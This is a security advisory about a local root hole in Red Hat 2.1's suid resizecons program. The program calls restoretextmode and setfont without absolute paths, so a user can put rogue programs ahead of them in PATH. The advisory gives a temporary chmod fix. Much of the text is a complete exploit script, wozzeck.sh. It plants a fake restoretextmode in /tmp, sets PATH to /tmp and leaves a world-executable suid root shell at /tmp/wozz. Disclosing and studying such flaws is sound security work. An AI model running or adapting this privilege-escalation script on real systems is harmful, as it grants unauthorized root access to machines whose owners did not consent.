There is a security hole in Red Hat 2.1, which installs the program /usr/bin/resizecons suid root. The resizecons program allows a user to change the videmode of the console. During this process, it runs the program restoretextmode without an absolute pathname, assuming the correct version will be found in the path, while running with root privileges. It then executes setfont in the same manner. By setting the path to find a rogue restoretextmode, a user can execute an arbitrary program as root. As a more amusing aside, the file /tmp/selection.pid is read and the pid contained within is sent a SIGWINCH, allowing a user on the system to force a redraw of the screen to an arbitrary process (that handles SIGWINCH calls) on the machine. If /usr/bin/resizecons needs to be run by users other than root at the console, provisions need to be made in the code to execute the outside utilities with absolute pathnames, and to check access rights on files before opening. Program: /usr/bin/resizecons Affected Operating Systems: Red Hat 2.1 linux distribution Requirements: account on system Temporary Patch: chmod -s /usr/bin/resizecons Security Compromise: root Author: Dave M. (davem@cmu.edu) Synopsis: resizecons runs restoretextmode without an absolute pathname while executing as root, allowing a user to substitute the real program with arbitrary commands. Exploit: wozzeck.sh: #!/bin/sh echo ================ wozzeck.sh - gain root on Linux Red Hat 2.1 system echo ================ Checking system vulnerability if test -u /usr/bin/resizecons then echo ++++++++++++++++ System appears vulnerable. cd /tmp cat << _EOF_ > /tmp/313x37 This exploit is dedicated to Wozz. Use it with care. _EOF_ cat << _EOF_ > /tmp/restoretextmode #!/bin/sh /bin/cp /bin/sh /tmp/wozz /bin/chmod 4777 /tmp/wozz _EOF_ /bin/chmod +x /tmp/restoretextmode PATH=/tmp echo ================ Executing resizecons /usr/bin/resizecons 313x37 /bin/rm /tmp/restoretextmode /bin/rm /tmp/313x37 if test -u /tmp/wozz then echo ++++++++++++++++ Exploit successful, suid shell located in /tmp/wozz else echo ---------------- Exploit failed fi else echo ---------------- This machine does not appear to be vulnerable. fi